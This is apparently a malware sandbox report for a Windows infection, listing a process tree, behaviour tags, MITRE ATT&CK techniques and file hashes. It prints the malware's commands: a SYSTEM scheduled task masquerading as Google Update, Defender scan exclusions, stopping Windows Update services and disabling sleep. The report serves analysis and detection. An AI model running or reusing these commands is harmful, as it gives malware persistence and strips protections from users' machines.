C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:6208
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:7692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5796
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:232
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:4688
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:6424
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1780
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:2848
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:6908
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:8188
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:3392
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Modifies data under HKEY_USERS
PID:7808
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3692
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3460
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2860
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:196
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:836
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3824
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4932
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3592
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:820
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:2516
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2060
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3980
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5708
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:5332
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵PID:5448
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:6228
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:6772
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:4320
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6304
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6796
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:6372
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:6072
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
PID:6992
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:6692
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3500
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5144
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
PID:4060
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:6028
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6240
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6468
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
PID:5140
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6308
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵PID:7956
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5840
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:4392
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:3788
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:1816
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:7536
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6416
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:516 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:6172
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:7912
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:7048
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:7468
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:5168
-
-
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
PID:6980
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5124
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
PID:7956
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3820
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:6976
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7060
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7964
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7700
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2768
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:6592
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:408
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
PID:5068
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
PID:5576
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
3Windows Service
3Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
74KB
MD5d4fc49dc14f63895d997fa4940f24378
SHA13efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\3A2KXCC7\pa[1].js
Filesize67KB
MD57b374dd1595b635437683964b2075c87
SHA1aa707484b7cf09c9ef7d218d7bec44bcd2637a95
SHA25618667e72cabc85a3fff20ea31a3c2575deb830625f5ace30b5250b24deaf088e
SHA512f6983d287a952c6494789f3f27a29efaaccac90973930216f28d8565aebc58b5ffed1a13b56864dd6534caac9aa8d03caa43288ce1d66b0f1d07c4a3e0c256c5
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\3A2KXCC7\tooltip[2].js
Filesize15KB
MD572938851e7c2ef7b63299eba0c6752cb
SHA1b75196bd3a6f9f4dfc1bbf5e43e96874bcd9ce4e
SHA256e2d4e0e1d3e162fdc815f16dfff9ae9b0a967949f0f3ae371f947d730a3f0661
SHA5122bb6c03a1335ef9514d0d172a4284d82a29d1783a72306bdcb8af3185d5cd2ff16303355aa4b05086d2fa0b5b7c7159cfa67de4a6175095ff0e68adec2a56ac1
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\89ETT2OD\recaptcha__en[1].js
Filesize461KB
MD54efc45f285352a5b252b651160e1ced9
SHA1c7ba19e7058ec22c8d0f7283ab6b722bb7a135d7
SHA256253627a82794506a7d660ee232c06a88d2eaafb6174532f8c390bb69ade6636a
SHA512cfc7aae449b15a8b84f117844547f7a5c2f2dd4a79e8b543305ae83b79195c5a6f6d0ccf6f2888c665002b125d9569cd5c0842fdd2f61d2a2848091776263a39
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\89ETT2OD\shared_global[1].css
Filesize84KB
MD515dd9a8ffcda0554150891ba63d20d76
SHA1bdb7de4df9a42a684fa2671516c10a5995668f85
SHA2566f42b906118e3b3aebcc1a31c162520c95e3b649146a02efd3a0fd8fcddebb21
SHA5122ceeb8b83590fc35e83576fe8058ddf0e7a942960b0564e9867b45677c665ac20e19c25a7a6a8d5115b60ab33b80104ea492e872cc784b424b105cc049b217e9
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\89ETT2OD\shared_global[1].js
Filesize149KB
MD58e8525cbdb99a095ffab84b841c65261
SHA1f384476680d626b53d3e7757492fa7c824e7f35a
SHA256c9e5be0ef70c363787844f5e94fa7ea895d170d173d0e3066ca0b13796c21d05
SHA512285525a9d10e392fc081ce167c7941308c4c0ceb534427b6498d29823f4c72a94ce9506a1ca8cbf602ed1aafe5150b9023ed020988548504192441605784a714
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\89ETT2OD\shared_responsive[1].css
Filesize18KB
MD52ab2918d06c27cd874de4857d3558626
SHA1363be3b96ec2d4430f6d578168c68286cb54b465
SHA2564afb3e37bfdd549cc16ef5321faf3f0a3bf6e84c79fc4408bc6f157280636453
SHA5123af59e0b16ef9d39c2f1c5ccdbd5c9ea35bd78571fde1b5bf01e51a675d5554e03225a2d7c04ed67e22569e9f43b16788105a0bf591ebba28ef917c961cc59e2
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\89ETT2OD\shared_responsive_adapter[1].js
Filesize24KB
MD5a52bc800ab6e9df5a05a5153eea29ffb
SHA18661643fcbc7498dd7317d100ec62d1c1c6886ff
SHA25657cfaf9b92c98541f769090cd0229a30013cea7cfafc18519ca654bfae29e14e
SHA5121bcacd0ec7c3d633d6296fff3325802d6352805f0d2cf1eea39237424229ecffad6cb2aee4248e28b1eca02ff0646b58240851a246bbcf0aa1083830d5d9081e
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\MSN82J9Y\buttons[2].css
Filesize32KB
MD5b91ff88510ff1d496714c07ea3f1ea20
SHA19c4b0ad541328d67a8cde137df3875d824891e41
SHA2560be99fd30134de50d457729cebd0e08342777af747caf503108178cb4c375085
SHA512e82438186bfc3e9ca690af8e099aafbfbc71c9310f9d1c8cb87ffa9e7f0f11f33982c63a2dac95c9b83fef1aaa59178b73212fc76e895d13a1ffbbe3c1adfa4c
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\MSN82J9Y\chunk~f036ce556[1].css
Filesize34KB
MD592f1378df1105b434f7def4ee86db032
SHA1b030d4eae4a67200937ecd86479ec23aa47c4596
SHA25664fb68e0df68e185e484878a712adbcac00e0482a2386286507d756294334ed4
SHA51200fb8fb66031bade3f5dc274b71217367792e69fdc9647bf8f71a13b8e43f77eb12b0dcef88c01f2b2b87e27442b94a1a16d2ae02d0a295249f298ed21d8154c
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\MSN82J9Y\hcaptcha[1].js
Filesize323KB
MD55334810719a3cb091a735803ffbbffc9
SHA1bc703f1c9b3ad56dd7659928b0c7e93b09b52709
SHA256bc8bb611de4a8fde99c8ca3393b429f6421f98f6fca51aacf3b2bbfea75159fe
SHA512e4adc37b1466620edf653ac6f09c25341f1eda1e7bae612c0321f14191d496dcca40a48811fc4d383bf7ac16d7e22ec108a411bd1faebba165eda396ec3d32ff
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cache\MSN82J9Y\m=_b,_tp[1].js
Filesize209KB
MD57fb78279051428c0fab30f50a4944cc7
SHA1857e07358eaf56b9f5506f0f72e88a2e8f7392c3
SHA256530880148fa5c9ac37d53bec5ed1df7546e850804e5e217175f3c7f348d4f4fd
SHA5120aa326f402e2a4e5a64ca5b144f460433e61dc636331f4fd920b965737cf9e006fc8b58fa7b8425a385093f594bd25bb95475ecccd777fb6fc6a7c9512214b97
-
